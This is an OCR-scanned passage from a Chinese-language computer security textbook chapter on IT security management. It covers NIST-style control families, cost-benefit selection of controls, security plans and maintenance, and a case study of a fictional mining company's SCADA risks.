Al, EUR (访问 ) 通知 ， 并 发 会 话 控制 ， 会 话 加 锁 ， 无 标识 或 鉴别 的 许可 动作 ， 安 全 属性 ， 远 程 访问 ， 无 线 访 
问 ， 移 动 设备 访问 控制 ， 外 部 信息 系统 使 用 ， 基 于 用 户 的 协作 和 信息 共享 ， 可 公开 访问 的 内 容 


意识 与 培训 
安全 意识 与 培训 的 策略 与 规程 ， 安 全 意识 ， 安 全 培训 ， 安 全 培训 记录 ， 与 安全 团体 和 协会 的 联系 
审计 与 可 核查 性 


审计 与 可 核查 性 的 策略 与 规程 ， 可 审计 事件 ， 审 计 记 录 的 内 容 ， 审 计 存 储 能 力 ， 审 计 处 理 失效 响应 ， 审 计 复 查 、 
分 析 与 报告 ， 审 计 归 约 与 报告 生成 ， 时 间 惟 ， 审 计 信息 保护 ， 抗 抵赖 ， 审 计 记录 保持 ， 审 计生 成 ， 信 息 汇 露 监 视 ， 
会 话 审计 
安全 评估 与 授权 

安全 评估 与 授权 的 策略 与 规程 ， 安 全 评估 ， 信 息 系 统 连接 ， 行 动 计划 和 里 程 碑 ， 安 全 认可 ， 持 续 监视 
配置 管理 


配置 管理 策略 与 规程 ， 基 线 配置 ， 配 置 变 更 控制 ， 安 全 影响 分 析 ， 对 于 变更 的 访问 限制 ， 配 置 设 置 ， 最 小 功能 
性 ， 信 息 系 统 组 件 清单 ， 配 置 管理 计划 


应 急 规划 


应 急 规划 策略 和 规程 ， 应 急 计 划 ， 应 急 培训 ， 应 急 计 划 测 试 与 演练 ， 备 用 存储 场所 ， 备 用 处 理 场所 ， 电 信服 务 ， 
信息 系统 备份 ， 信 息 系 统 恢复 与 重建 


标识 与 监 别 

标识 与 鉴别 的 策略 与 规程 ， 标 识 与 鉴别 (组织 用 户 )， 设 备 标 识 与 鉴别 ， 识 别 符 管理 ， 鉴 别 器 管理 ， 鉴 别 器 反馈 ， 
密码 模块 鉴别 ， 标 识 与 鉴别 ( 非 组 织 用 户 ) 
事件 响应 


事件 响应 策略 与 规程 ， 事 件 响应 培训 ， 事 件 响 应 测试 与 演练 事件 处 理 ， 事 件 监视 ， 事 件 报告 ， 事 件 响 应 援助 ， 
事件 响应 计划 


维护 

系统 维护 策略 与 规程 ， 可 控 维 护 ， 维 护 工具 ， 非 本 地 维护 ， 维 护 人 员 ， 定 期 维护 
介质 保护 

介质 保护 策略 与 规程 ， 介 质 访问 ， 介 质 标记 ， 介 质 存储 ， 介 质 运输 ， 介 质 净化 
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( 续 ) 
物理 与 环境 保护 


物理 与 环境 保护 的 策略 与 规程 ， 物 理 访问 授权 ， 物 理 访问 控制 ， 传 输 介质 访问 控制 ， 输 出 设备 访问 控制 ， 监 视 物 
理 访问 ， 来 访 者 控制 ， 访 问 记 录 ， 电 力 设备 与 电力 线 缆 ， 应 急 关 闭 ， 应 急电 源 ， 应 急 照明 ， 火 灾 保护 ， 温 度 与 湿度 
控制 ， 水 损害 保护 ， 交 付 与 移 除 ， 备 用 工作 场所 ,信息 系统 组 件 位 置 ， 信 息 泄 漏 


规划 

安全 规划 策略 与 规程 ， 系 统 安全 计划 ， 行 为 规则 ， 保 密 影响 评估 ， 安 全 相关 活动 规划 

人 员 安 全 

人 员 安 全 策略 与 规程 ， 岗 位 分 类 ， 人 员 审 查 ， 人 员 终 止 ， 人 员 调 动 ， 访 问 协 议 , 第 三 方 人 员 安 全 ， 人 员 处 罚 
风险 评估 

风险 评估 策略 与 规程 ， 安 全 分 类 ， 风 险 评估 ， 脆 弱 性 扫描 

系统 与 服务 获取 


系统 和 服务 获取 的 策略 与 规程 ， 资 源 分 配 ， 生 命 周 期 支持 ， 获 取 ， 信 息 系统 文档 ， 软 件 使 用 限制 ， 用 户 安装 软 
件 ， 安 全 工程 原则 ， 外 部 信息 系统 服务 ， 开 发 者 配置 管理 ， 开 发 者 安全 测试 ， 供 应 链 保护 ， 可 信 性 ， 关 键 信息 系统 
组 件 


系统 与 通信 保护 


系统 与 通信 保护 的 策略 与 规程 ， 应 用 程序 分 割 ， 安 全 功能 隔离 ， 共 享 资源 信息 ， 拒 绝 服务 保护 ， 资 源 优先 
级 ， 边 界 保护 ， 传 输 完 整 性 ， 传 输 保 密 性 ， 网 络 断 开 ， 可 信 路 径 ， 密 钥 建 立 与 管理 ， 密 码 使 用 ， 公 共 访 问 保 
护 ， 协 同 计算 设备 ， 安 全 属性 传输 ， 公 钥 基 础 设施 证 书 ， 移 动 代码 ， 网 络 电话 ， 安 全 名 / 地 址 解析 服务 (递归 
或 高 速 缓存 解析 器 )， 名 字 / 地 址 解析 服务 架构 与 设施 ， 会 话 真实 性 ， 已 知 状态 失败 ， 瘦 结 点 ， 蜜 饶 ， 独 立 于 操 
作 系 统 的 应 用 ， 剩 余 信息 保护 ， 异 构 ， 虚 拟 化 技术 ， 隐 项 通道 分 析 ， 信 息 系统 分 割 ， 传 输 准 备 完整 性 ， 不 可 更 改 的 
可 执行 程序 

系统 与 信息 完整 性 


系统 与 信息 完整 性 的 策略 与 规程 ， 缺 陷 修 复 ， 恶 意 代码 保护 ， 信 息 系统 监视 ， 安 全 告警 咨询 与 指令 ， 安 全 功能 验 
证 ， 软 件 与 信息 完整 性 ， 垃 圾 邮件 保护 ， 信 息 输入 限制 ， 信 息 输 入 验证 ， 差 错 处 理 ， 信 息 输出 处 理 和 保留 ， 可 预测 
失效 防护 


项 目 管理 


信息 安全 项 目 计 划 ， 高 级 信息 安全 官 ， 信 息 安全 资源 ， 行 动 计划 与 里 程 碑 过 程 ， 信 息 系统 资产 清单 ， 信 息 安全 绩 
效 措 施 ， 企 业 架 构 ， 关 键 基础 设施 计划 ， 风 险 管理 战略 ， 安 全 授权 过 程 ， 使 命 /业务 过 程 定 义 


[NIST06] 建议 ， 当 考虑 如 下 内 容 时 ， 有 必要 进行 适当 的 调整 : 

© 技术 (technology): 某 些 控制 措施 仅仅 适用 于 特定 的 技术 ， 因 此 只 有 在 系统 中 包含 了 
这 些 技术 的 时 候 ， 才 需要 用 到 这 些 控制 措施 。 这 方面 的 例子 包括 无 线 网 络 和 密码 技术 。 
某 些 控制 措施 只 有 在 系统 需要 并 且 支 持 这 些 技术 的 时 候 才 适用 ， 例 如 作为 访问 权 标 
(access token) 的 读 卡 器 。 如 果 一 个 系统 中 不 支持 这 些 技术 ， 那么 可 以 采用 其 他 手段 ， 
包括 用 管理 规程 或 者 物理 访问 控制 措施 来 代替 。 

e 公共 控制 措施 (common control): 整个 公司 可 能 是 集中 管理 ， 因 此 安全 问题 并 不 是 某 
个 特定 系统 的 管理 者 的 责任 。 控 制 措施 的 变更 需要 共同 协商 和 集中 管理 。 

e 公开 访问 系统 ( public access system): 一 些 系统 ， 如 公司 对 外 的 Web 服务 器 ， 是 可 以 
被 外 部 访问 的 。 一 些 控制 措施 ， 如 与 人 员 安 人 全、 标识、 鉴别 相关 的 ， 应 该 不 能 通过 公 
开 接 口 访 问 ， 它 们 只 能 被 系统 管理 者 访问 。 因 此 对 这 些 控制 措施 的 应 用 范围 必须 仔细 
规定 。 

o 基础 设施 控制 控制 (infrastructure control): 物理 访问 或 者 环境 控制 措施 仅 与 承载 相关 设 
备 的 区 域 相关 。 

e 规模 问题 (scalability issue): 因为 控制 措施 与 具体 的 组 织 密切 相关 ， 所 以 其 规模 和 复杂 
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程度 会 因为 组 织 的 不 同 而 具有 多 样 性 。 例 如 ， 一 个 大 型 组 织 的 关键 系统 的 应 急 方 案 将 
会 比 小 公司 的 方案 要 大 得 多 也 详细 得 多 。 
© 风险 评估 (risk assessment): 控制 措施 会 不 断根 据 组 织 风险 评估 的 结果 而 被 调整 ， 这 正 
是 我 们 现在 所 考虑 的 。 
如 果 正 在 使 用 某 种 形式 化 或 非 形式 化 的 风险 评估 过 程 ， 它 将 会 对 如 何 解 决 组 织 信息 系统 存 
在 的 特定 风险 提供 指导 。 其 结果 就 是 选择 采用 一 些 运 行 层面 或 者 技术 层面 的 控制 措施 来 减少 风 
险 的 发 生 ， 使 得 组 织 的 风险 达到 一 个 可 以 接受 的 级 别 。 具 体 做 法 可 能 是 对 已 有 的 基线 控制 措施 
增添 一 些 新 的 控制 措施 ， 或 者 只 是 简单 地 对 当前 正在 使 用 的 控制 措施 进行 改进 ， 从 而 使 其 更 加 
具体 和 规范 。 
图 15-1 列举 的 过 程 表明 ， 一 个 好 的 控制 列表 应 该 能 够 解决 每 一 个 需要 处 理 的 风险 问题 ， 
并 与 组 织 的 系统 和 策略 保持 一 致 。 选 择 的 控制 列表 应 当 包 括 对 每 一 个 控制 措施 的 可 行 性 和 有 效 
性 的 具体 描述 。 可 行 性 主要 涉及 几 个 因素 ， 如 技术 兼容 性 、 对 已 有 系统 在 运行 方面 的 影响 以 及 
用 户 接受 该 控制 措施 的 可 能 性 。 有 效 性 是 指 实施 控制 措施 的 成 本 与 其 使 得 风险 等 级 降低 程度 
之 比 。 
实施 一 种 新 的 或 加 强 的 控制 措施 所 带 来 的 风险 等 级 降低 ， 主 要 是 因为 控制 措施 降低 了 威胁 
的 可 能 性 或 后 果 ， 如 图 15-3 所 示 。 有 两 种 方法 能 降低 威胁 的 可 能 性 : 减少 系统 脆弱 性 (缺陷 
或 者 弱点 )， 或 者 降低 威胁 源 的 能 力 和 动机 。 减 少 威胁 带 来 的 后 果 是 通过 降低 组 织 内 威胁 的 负 
面 影响 来 实现 的 。 





图 15-3 ”残余 风险 


组 织 有 可 能 没有 足够 的 资源 去 实施 所 有 推荐 的 控制 措施 ， 因 此 管理 层 必 须 进行 成 本 效益 分 
析 来 决定 在 当前 可 用 资源 的 情况 下 哪 一 种 控制 措施 最 合适 ， 并 且 能 给 组 织 提供 最 大 利益 。 这 样 
的 分 析 可 以 是 定性 的 ， 也 可 以 是 定量 的 ， 但 必须 证 明 实 施 控 制 措施 的 成 本 相对 于 减少 的 风险 来 
说 是 划算 的 。 它 应 该 包括 实施 新 的 或 增强 的 控制 措施 所 带 来 的 具体 影响 ， 不 实施 这 样 的 控制 措 
施 将 会 带 来 的 影响 以 及 估算 的 实施 成 本 。 最 后 必须 评估 相对 于 系统 和 关键 数据 来 说 实施 控制 措 
施 的 成 本 和 收益 ， 以 此 来 确定 选择 这 样 一 种 控制 措施 的 重要 性 。 

管理 层 必 须 确定 ， 选 择 哪 一 种 控制 措施 能 使 组 织 的 系统 达到 可 以 接受 的 风险 级 别 。 在 选择 
控制 措施 的 时 候 将 会 考虑 到 如 下 的 因素 : 

o 如 果 一 种 控制 措施 对 风险 的 降低 程度 超过 了 需要 ， 则 可 以 选择 成 本 更 低 的 控制 措施 。 

。 如 果 一 种 控制 措施 的 成 本 高 于 它 所 降低 的 风险 ， 则 应 该 选择 其 他 控制 措施 。 

o 如 果 一 种 控制 措施 未 能 充分 降低 风险 ， 则 应 该 使 用 更 多 的 或 不 同 的 控制 措施 。 
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© 如 果 一 种 控制 措施 充分 地 降低 了 风险 并 且 是 最 合算 的 ， 那么 就 采用 这 种 控制 措施 。 
通常 实施 一 项 控制 措施 的 代价 比 不 实施 它 的 代价 要 更 具体 且 容 易 估算 。 管 理 层 必须 考虑 那 
些 不 太 明确 的 代价 ， 以 此 来 确定 最 终 控制 措施 的 选择 以 及 残余 的 风险 。 


15.3 IT 安全 计划 


在 确定 一 系列 可 能 的 控制 措施 后 ， 管 理 层 从 中 选择 一 些 控制 措施 来 实施 ， 并 制定 一 份 IT 
安全 计划 。 在 安全 计划 中 描述 了 具体 要 做 什么 ， 需 要 什么 样 的 资源 ， 谁 是 负责 人 。 目 标 是 及 时 
描述 为 改进 组 织 风险 现状 中 存在 的 缺陷 而 采取 的 措施 。[NIST12] 建议 安全 计划 应 该 包含 如 下 的 
细节 : 

© 风险 (资产 /威胁 /脆弱 性 的 组 合 ) 

o 推荐 的 控制 (来 自 风 险 评估 ) 

© 对 每 一 个 风险 采取 措施 的 优先 级 

e 所 选择 的 控制 措施 (建立 在 成 本 效益 分 析 基 础 上 ) 

e 执行 控制 措施 所 需要 的 资源 

e 负责 人 员 

。 执行 控制 措施 的 目标 开始 日 期 和 结束 日 期 

e 维护 需求 和 其 他 意见 

这 些 细节 描述 是 在 实施 计划 (implementation plan) 表 中 总 结 出 来 的 ， 如 表 15-4 所 示 。 该 
表 描 述 了 针对 表 14-5 中 风险 识别 实例 的 实施 计划 的 例子 。 推 荐 的 控制 措施 是 远程 访问 、 可 审 
计 事 件 、 用 户 标识 、 系 统 备 份 和 配置 变更 控制 等 方面 的 具体 实例 ， 应 用 于 已 识别 受到 威胁 的 资 
产 。 所 有 这 些 控制 措施 都 被 选中 了 ， 因 为 这 些 控制 措施 的 成 本 不 高 ， 实 施 起 来 也 不 困难 。 不 过 
确实 需要 对 实施 过 程 做 一 些 改变 。 而 且 必 须 把 这 些 变化 通知 给 相关 网 络 管理 人 员 。 同 时 也 需要 
对 相关 员工 进行 培训 ， 让 他 们 知道 如 何 正确 实施 新 规程 ， 并 了 解 其 权利 和 责任 。 

表 15-4 计划 的 实施 
风险 (资产 /威胁 ) | 针对 Internet 路 由 器 的 黑客 攻击 
风险 等 级 高 


。 取消 外 部 的 telnet 访问 

。 对 特权 级 命令 进行 更 详细 的 审计 
推荐 的 控制 。 针对 强 管理 员 口 令 做 一 些 规定 

。 为 路 由 器 配置 文件 设置 备份 策略 

。 为 路 由 器 配置 设置 变更 控制 策略 


优先 级 高 
。 增强 访问 鉴别 强度 

已 选 控制 。 安 装 人 侵 检测 软件 

需要 的 资源 。 需要 IT 网 络 管理 员 3 个 工作 日 的 时 间 来 改变 和 核对 路 由 器 配置 信息 以 及 编写 安全 策略 
。 需要 1 个 工作 日 来 对 网 络 管理 人 员 进 行 培训 

负责 人 John Doe、 主 任 网 络 系统 管理 员 、 公 司 IT 支持 组 

起 始 日 期 2011 年 2 月 1 日 至 2011 年 2 月 4 日 

备注 。 需要 定期 测试 和 评审 采用 的 配置 和 策略 

15.4 控制 的 实施 


如 图 14-1 所 示 ，IT 安全 管理 过 程 的 下 一 阶段 是 实施 IT 安全 计划 中 描述 的 控制 措施 。 这 包 
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含 了 第 14 章 中 讨论 的 循环 实施 模型 的 “执行 ”阶段 。 实 施 阶 段 不 仅 包含 了 直接 实施 安全 计划 
中 描述 的 控制 措施 ， 而 且 也 包括 了 相关 的 特定 培训 和 组 织 的 总 体 安全 意识 方案 。 


15.4.1 安全 计划 的 实施 


IT 安全 计划 记录 着 对 每 一 个 选 定 的 控制 措施 所 要 做 的 工作 、 对 应 的 负责 人 以 及 所 需要 的 
资源 和 时 间 等 。 然 后 ， 被 指定 的 人 员 就 将 执行 计划 中 的 任务 以 实现 这 些 新 增 的 或 是 加 强 过 的 控 
制 措施 ， 具 体 的 任务 可 能 是 技术 方面 的 、 管 理 方面 的 ， 或 者 运行 方面 的 。 整 个 过 程 可 能 涉及 系 
统 配置 的 变更 、 升 级 或 者 新 系统 的 安装 等 的 综合 信息 。 还 可 能 包含 开发 新 的 或 者 扩展 的 实施 程 
序 ， 用 以 记录 为 达到 预期 安全 目标 所 需要 的 实际 操作 。 需 要 注意 的 是 ， 即 使 是 技术 控制 ， 通 党 
也 需要 与 操作 程序 关联 起 来 ， 从 而 保证 它们 能 被 正确 使 用 。 这 些 程序 的 使 用 应 当 得 到 管理 层 的 
支持 和 监督 。 | 

我 们 应 该 监督 安全 计划 实施 的 过 程 从 而 确保 它们 的 正确 性 。 通 常 这 是 由 组 织 的 安全 官 来 执 
行 的 ， 他 们 检查 如 下 的 内 容 : 

。 控制 措施 实施 的 成 本 和 资源 是 否 在 规定 的 范围 内 。 

。 控制 措施 是 否 按 计划 正确 实施 ， 以 便 达 到 已 确定 的 风险 降低 水 平 。 

。 控制 措施 是 否 按 要 求 运行 和 管理 。 

当 实 施 过 程 成 功 完成 时 ， 管 理 层 需要 授权 以 便 系统 投入 运行 。 这 可 以 是 组 织 内 部 非 形式 化 
的 一 个 过 程 。 但 是 在 有 些 情况 下 ， 特 别 是 对 于 政府 部 门 ， 该 过 程 是 认可 系统 满足 要 求 标准 的 形 
式 化 过 程 的 一 部 分 。 这 通常 与 我 们 在 第 13 章 所 讨论 的 可 信 计算 系统 的 安装 、 认 证 和 使 用 相关 
联 。 在 这 种 情况 下 ， 需 要 外 部 鉴定 机 构 来 核实 该 系统 被 正确 设计 并 实现 的 所 记录 的 证 据 。 


15.4.2 ”安全 意识 与 培训 


对 组 织 的 全 体 员工 进行 适当 的 安全 意识 培训 ， 并 针对 特定 的 系统 和 控制 措施 进行 具体 的 培 
训 ， 这 是 实施 控制 措施 的 一 个 必要 的 组 成 部 分 。 我 们 将 在 第 17 章 进 一 步 讨 论 这 些 问 题 ， 届 时 
将 探讨 与 人 员 安 全 相关 的 策略 。 


15.5 ”监视 风险 


IT 安全 管理 过 程 并 不 是 在 控制 措施 的 实施 以 及 对 相关 人 员 的 培训 之 后 就 结束 。 正 如 我 们 
在 第 14 章 中 提 到 的 ， 这 是 一 个 循环 的 过 程 ， 将 一 直 不 停 地 重复 下 去 ， 以 此 来 对 信息 系统 和 风 
险 环 境 做 出 响应 。 各 种 控制 措施 实施 后 ， 我 们 还 应 当 对 其 进行 监视 ， 从 而 确保 它们 持续 有 效 。 
任何 对 系统 做 出 变更 的 提议 都 应 该 经 过 安全 审查 ， 有 必要 的 话 还 应 该 对 涉及 的 系统 重新 做 一 次 
风险 评估 。 遗 憾 的 是 ，IT 安全 管理 在 这 方面 经 常 是 最 不 受 重视 的 ， 大 多 数 情况 下 只 是 在 事后 
才 对 其 进行 考虑 。 如 果 我 们 不 对 变更 系统 的 提议 进行 安全 审查 ， 将 会 极 大 增加 安全 事故 发 生 的 
可 能 性 。 管 理 过 程 的 后 续 阶 段 包括 如 下 几 方 面 内 容 : 

© 维护 安全 控制 

e 安全 符合 性 检查 

e 变更 和 配置 管理 

e 事件 处 理 

其 中 任何 一 个 方面 都 可 能 声明 需要 对 IT 安全 管理 过 程 中 以 前 的 一 些 阶 段 做 出 一 定 的 改变 。 
一 个 明显 的 例子 是 : 如 果 有 违背 安全 规则 的 行为 发 生 ， 比 如 一 个 桌面 系统 感染 了 病毒 ， 那 么 就 
要 对 该 风险 评估 所 选择 的 控制 措施 或 者 对 实施 的 具体 细节 做 一 些 修改 。 这 就 会 导致 对 过 程 的 前 
期 阶段 重新 进行 审查 。 
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15.5.1 维护 


首先 考虑 的 问题 是 对 实施 的 控制 措施 进行 持续 的 维护 和 监督 ， 确 保 它们 一 直 正 确 且 正确 地 
被 执行 。 有 人 负责 维护 过 程 是 非常 重要 的 ， 这 通常 是 由 组 织 的 安全 官 来 协调 的 。 维 护 工作 主要 
是 确保 : 

o 对 控制 措施 定期 评审 ， 核 实 它们 仍然 能 实现 预期 功能 。 

o 当 有 新 的 需求 的 时 候 ， 对 控制 措施 进行 更 新 。 

© 系统 的 变更 不 会 对 控制 措施 产生 负面 的 影响 。 

© 新 的 威胁 或 脆弱 性 还 未 被 公开 。 

评审 包括 定期 分 析 日 志文 件 ， 以 确保 各 种 系统 组 件 按 预 期 的 功能 运行 ， 并 确定 防范 异常 事 
件 的 活动 基线 。 我 们 将 在 第 18 章 进一步 讨论 安全 审计 。 

维护 的 目的 是 确保 控制 措施 按照 要 求 运作 ， 从 而 使 得 组 织 的 风险 维持 在 一 个 预定 的 水 平 。 
如 果 不 能 维护 这 些 控制 措施 ， 就 会 导致 安全 违规 ， 从 而 对 组 织造 成 潜在 的 严重 影响 。 


155.2 ”安全 符合 性 


安全 符合 性 ( security compliance) 检查 就 是 评审 组 织 的 安全 过 程 的 审计 过 程 。 目 的 是 核查 
安全 计划 的 符合 性 。 审 计 可 以 由 内 部 人 员 或 外 部 人 员 进 行 。 该 过 程 一 般 基 于 核查 表 完 成 ， 验 证 
是 否 创建 了 合适 的 策略 和 计划 ， 是 否 选择 了 合适 的 控制 措施 ， 以 及 这 些 控 制 措施 是 否 得 到 了 正 
确 的 维护 和 使 用 。 

该 审计 过 程 对 于 新 的 信息 系统 和 服务 ， 应 在 其 实施 时 同步 进行 ， 对 于 已 有 系统 ， 通 常 作 
为 组 织 更 广泛 、 更 普遍 的 审计 过 程 的 一 部 分 而 定期 进行 ， 或 者 当 组 织 的 安全 方针 发 生变 化 时 
进行 。 


15.5.3 ”变更 与 配置 管理 


变更 管理 ( change management) 主要 是 对 影响 组 织 的 系统 及 其 使 用 的 系统 变更 提议 进行 评 
审 的 过 程 。 很 多 原因 都 可 能 导致 对 已 有 系统 进行 变更 ， 例 如 

e 用 户 反馈 的 问题 或 者 用 户 要 求 改进 系统 。 

© 发 现 系统 存在 新 的 威胁 或 者 脆弱 性 。 

e 通知 用 户 安装 补丁 或 者 对 软 硬 件 进行 升级 。 

e 技术 的 发 展 。 

o 新 的 IT 特征 或 服务 的 实施 ， 要 求 对 已 有 系统 进行 变更 。 

e 出 现 新 任务 ， 要 求 对 已 有 系统 进行 变更 。 

应 该 对 任何 一 个 变更 组 织 的 系统 的 提议 可 能 带 来 的 影响 进行 评估 。 这 不 但 包括 与 安全 相 
关 的 问题 ， 而 且 包括 诸如 操作 等 方面 的 问题 。 对 系统 变更 的 管理 是 整个 系统 管理 过 程 中 非常 重 
要 的 一 部 分 。 因 为 系统 的 变更 将 会 影响 到 系统 的 安全 ， 所 以 这 一 过 程 和 IT LSPs, 
而 且 必 定 相互 影响 。 

一 个 重要 的 例子 是 ， 为 了 解决 一 个 普通 操作 系统 和 应 用 程序 的 缺陷 及 安全 问题 ， 经 常 需要 
对 其 打 补 丁 。 如 果 组 织 正 在 运行 一 套 系统 ， 该 系统 运行 着 一 系列 的 应 用 程序 ， 那 么 不 管 该 系统 
的 复杂 程度 如 何 ， 针 对 该 系统 的 任何 补丁 都 需要 对 其 进行 检查 以 保证 不 会 对 其 他 的 应 用 程序 产 
生 副 作用 。 这 是 一 个 非常 耗 时 的 过 程 ， 因 为 它 需要 耗费 相当 多 的 管理 资源 。 如 果 不 对 补丁 做 检 
测 ， 一 种 代替 方法 就 是 推迟 对 系统 打 补 丁 或 者 推迟 升级 。 但 是 这 样 会 使 组 织 在 一 个 新 漏洞 下 暴 
露 一 段 时 间 ; 另 一 种 方法 ， 就 是 不 对 系统 升级 的 补丁 进行 检测 而 直接 安装 ， 这 样 补丁 可 能 会 影 
响 到 系统 其 他 的 一 些 应 用 程序 ， 使 系统 其 他 方面 的 一 些 功能 出 现 问题 ， 或 者 工作 不 正常 。 
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理想 状况 就 是 对 系统 做 出 变更 后 ， 系 统 的 安全 性 能 够 得 到 提高 。 但 是 实际 情况 可 能 是 ， 基 
于 一 些 商业 原因 而 强制 对 系统 进行 的 修改 反而 会 降低 系统 的 安全 性 。 在 这 种 情况 下 ， 记 录 下 系 
统 改变 的 原因 ， 系 统 改 变 对 组 织 安全 性 能 的 影响 以 及 管理 部 门 对 该 改变 的 授权 过 程 就 显得 尤为 
重要 。 组 织 获得 的 利益 可 能 是 以 增加 风险 等 级 为 代价 的 。 

变更 管理 过 程 可 能 是 非 形 式 化 或 形式 化 的 ， 这 取决 于 组 织 的 规模 和 它 整体 的 信息 系统 管理 过 
程 。 在 形式 化 过 程 中 ， 任 何 一 个 对 系统 进行 变更 的 提议 都 应 该 被 记录 下 来 ， 并 且 在 实施 之 前 对 其 
测试 。 作 为 该 过 程 的 一 部 分 ， 任 何 相关 的 文档 ， 包 括 相 关 的 安全 文档 和 程序 都 应 该 及 时 进行 更 新 。 

配置 管理 ( configuration management) 专门 跟踪 每 个 系统 正在 使 用 的 配置 信息 及 其 变更 情 
况 ， 包 括 每 个 系统 安装 的 软件 和 硬件 版 本 信息 。 这 些 信 息 有 助 于 在 系统 崩溃 后 对 其 进行 恢复 
(不 管 是 否 涉及 安全 问题 )， 同 时 我 们 也 需要 这 些 信息 来 帮助 我 们 了 解 哪些 补丁 和 升级 软件 可 能 
和 一 个 特殊 系统 相关 。 再 次 重申 一 下 ， 这 是 一 个 和 安全 相关 的 常规 的 系统 管理 过 程 ， 它 必须 和 

528] IT 安全 管理 相 结合 。 


15.5.4 ”事件 处 理 


该 过 程 主要 是 对 安全 事件 进行 响应 ， 是 IT 安全 管理 后 续 阶 段 的 最 后 一 部 分 内 容 。 该 主题 
将 在 第 17 章 进一步 讨论 ， 届 时 我 们 将 探讨 与 人 为 因素 相关 的 安全 策略 。 


15.6 ”案例 学 习 : 银 星 矿业 


考虑 第 14 章 中 介绍 的 案例 ， 该 案例 涉及 一 个 虚构 的 公司 : 银 星 矿业 公司 的 运作 情况 。 假 
设 我 们 已 经 知道 了 针对 该 公司 的 风险 评估 结果 ， 安 全 管理 的 下 一 步 就 是 确定 可 能 的 控制 措施 。 
从 风险 评估 提供 的 信息 来 看 ， 很 显然 表 15-3 中 的 很 多 控制 措施 都 不 能 使 用 。 其 中 有 一 条 意见 
被 多 次 反映 ， 那 就 是 该 公司 正在 使 用 的 许多 系统 都 没有 进行 定期 更 新 ， 并 且 已 识别 风险 对 系统 
安全 构成 潜在 威胁 的 部 分 原因 是 存在 一 个 已 经 公开 但 未 打 补 丁 的 漏洞 。 这 显然 表明 ， 我 们 应 该 
关注 这 样 一 些 相关 的 控制 措施 ， 那 就 是 对 服务 器 和 客户 的 操作 系统 以 及 应 用 软件 进行 定期 的 系 
统 维护 。 这 些 控制 措施 包括 : 

。 配置 管理 策略 与 规程 
基线 配置 
系统 维护 策略 与 规程 
定期 维护 
缺陷 修复 

o 针对 恶意 代码 的 保护 

© 针对 垃圾 邮件 和 间谍 软件 的 保护 

考虑 到 潜在 的 事件 可 能 发 生 ， 我 们 也 应 该 注意 制定 针对 意外 事件 的 计划 来 检测 和 应 对 这 样 

的 事件 ， 并 且 使 得 系统 的 功能 能 够 得 到 迅速 的 恢复 。 我 们 应 该 关注 如 下 控制 措施 : 

e 审计 监视 、 分 析 与 报告 

e 审计 归 约 与 报告 生成 

© 应 急 规划 策略 与 规程 

。 事件 响应 策略 与 规程 

e 信息 系统 备份 

e 信息 系统 恢复 与 重建 

这 些 控制 措施 通常 可 以 适用 于 所 有 已 知 的 风险 并 且 可 以 被 组 成 一 个 易于 管理 的 系统 。 因 此 
[529] 这 些 控制 措施 的 成 本 效益 是 很 高 的 ， 因 为 他 们 针对 多 种 已 识别 的 风险 提供 了 更 高 的 安全 水 平 。 
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现在 我 们 考虑 具体 的 风险 项 目 。 最 高 优先 级 的 风险 与 SCADA (监控 与 数据 采集 系统 ) 结 
点 和 网 络 的 可 靠 性 、 完 整 性 相关 。 这 是 因为 该 公司 的 许多 系统 都 在 运行 存在 一 些 已 知 漏洞 的 老 
版 本 的 操作 系统 。 另 外 ， 这 些 系统 不 能 打 补 丁 或 升级 是 因为 它们 所 运行 的 关键 应 用 程序 还 没有 
被 升级 或 者 还 没有 被 授权 ， 所 以 还 不 能 运行 新 版 本 的 操作 系统 。 考 虑 到 在 减少 单独 结 点 脆弱 性 
时 存在 的 这 些 限 制 ， 我 们 应 该 关注 能 将 SCADA 结 点 和 网 络 从 公司 网 络 中 隔离 出 来 的 防火 墙 和 
代理 服务 器 。 这 些 系 统 能 够 通过 我 们 确定 的 控制 措施 被 定期 地 管理 和 维护 。 另 外 ， 由 于 进出 
SCADA 网 络 的 通信 和 是 高 度 结构 化 的 并 且 是 可 以 预知 的 ， 因 此 运行 一 套 人 侵 检测 系统 可 能 比 运 
行 通常 使 用 的 公司 网 络 要 可 靠 得 多 。 该 系统 应 该 可 以 鉴别 攻击 的 流量 ， 因 为 这 和 正常 的 通信 流 
差别 很 大 。 这 样 一 个 系统 还 可 能 涉及 对 审计 记录 进行 自动 的 、 细 致 的 分 析 ， 其 中 的 审计 信息 来 
自 于 已 有 防火 墙 或 者 代理 服务 器 系统 。 更 可 能 的 情况 是 ， 存 在 一 个 独立 的 系统 通过 上 面 这 些 系 
统 来 连接 和 监视 网 络 流量 。 整 个 系统 还 能 进一步 扩展 成 一 个 具有 自动 响应 能 力 的 系统 。 当 攻击 
被 检测 出 来 的 时 候 ， 该 系统 能 够 自动 为 网 络 连接 提供 服务 。 这 使 我 们 意识 到 ， 对 于 SCADA 结 
点 的 正确 操作 是 不 需要 网 络 连 接 的 。 事 实 上 ， 本 来 的 设计 也 是 让 这 些 结 点 的 运行 不 需要 网 络 连 
接 ， 这 是 导致 它们 不 安全 的 主要 原因 。 这 样 所 有 可 能 的 代价 就 是 改进 的 总 体 监 视 和 对 SCADA 
结 点 的 管理 。 如 果 这 些 都 正常 工作 的 话 ， 系 统 被 成 功 攻击 的 可 能 性 已 经 非常 低 了 ， 但 仍然 有 可 
能 进一步 降低 。 

第 二 优先 级 的 风险 和 存储 信息 的 完整 性 相关 。 很 显然 ， 所 有 通用 控制 都 会 帮助 降低 该 风 
险 。 更 具体 的 情况 是 ， 大 量 的 文件 分 布 在 多 个 管理 不 一 致 的 系统 中 ， 这 就 会 引发 很 多 问题 。 如 
果 公 司 运作 的 所 有 关键 文件 都 存储 在 一 个 运行 程序 较 少 的 文件 服务 器 上 ， 那 么 风险 就 比较 容易 
被 管理 。 通 过 使 用 通用 控制 就 可 以 对 其 进行 恰当 的 管理 。 这 表明 我 们 需要 对 关键 文件 做 一 个 审 
计 ， 这 样 我 们 就 能 知道 谁 是 这 些 文件 的 负责 人 ， 这 些 文件 当前 被 存在 什么 地 方 。 我 们 还 需要 一 
项 策略 来 详细 规定 关键 的 文档 应 该 只 能 在 被 批准 的 中 心服 务 器 上 建立 和 存储 。 已 有 的 文件 也 应 该 
被 转移 到 这 些 服务 器 上 。 还 要 对 涉及 的 用 户 进行 适当 的 教育 和 培训 以 确保 这 些 策略 被 正确 地 执行 。 

接 下 来 的 三 个 风险 涉及 关键 的 财务 、 采 购 和 维护 / 生产 系统 的 可 用 性 或 者 完整 性 。 我 们 应 
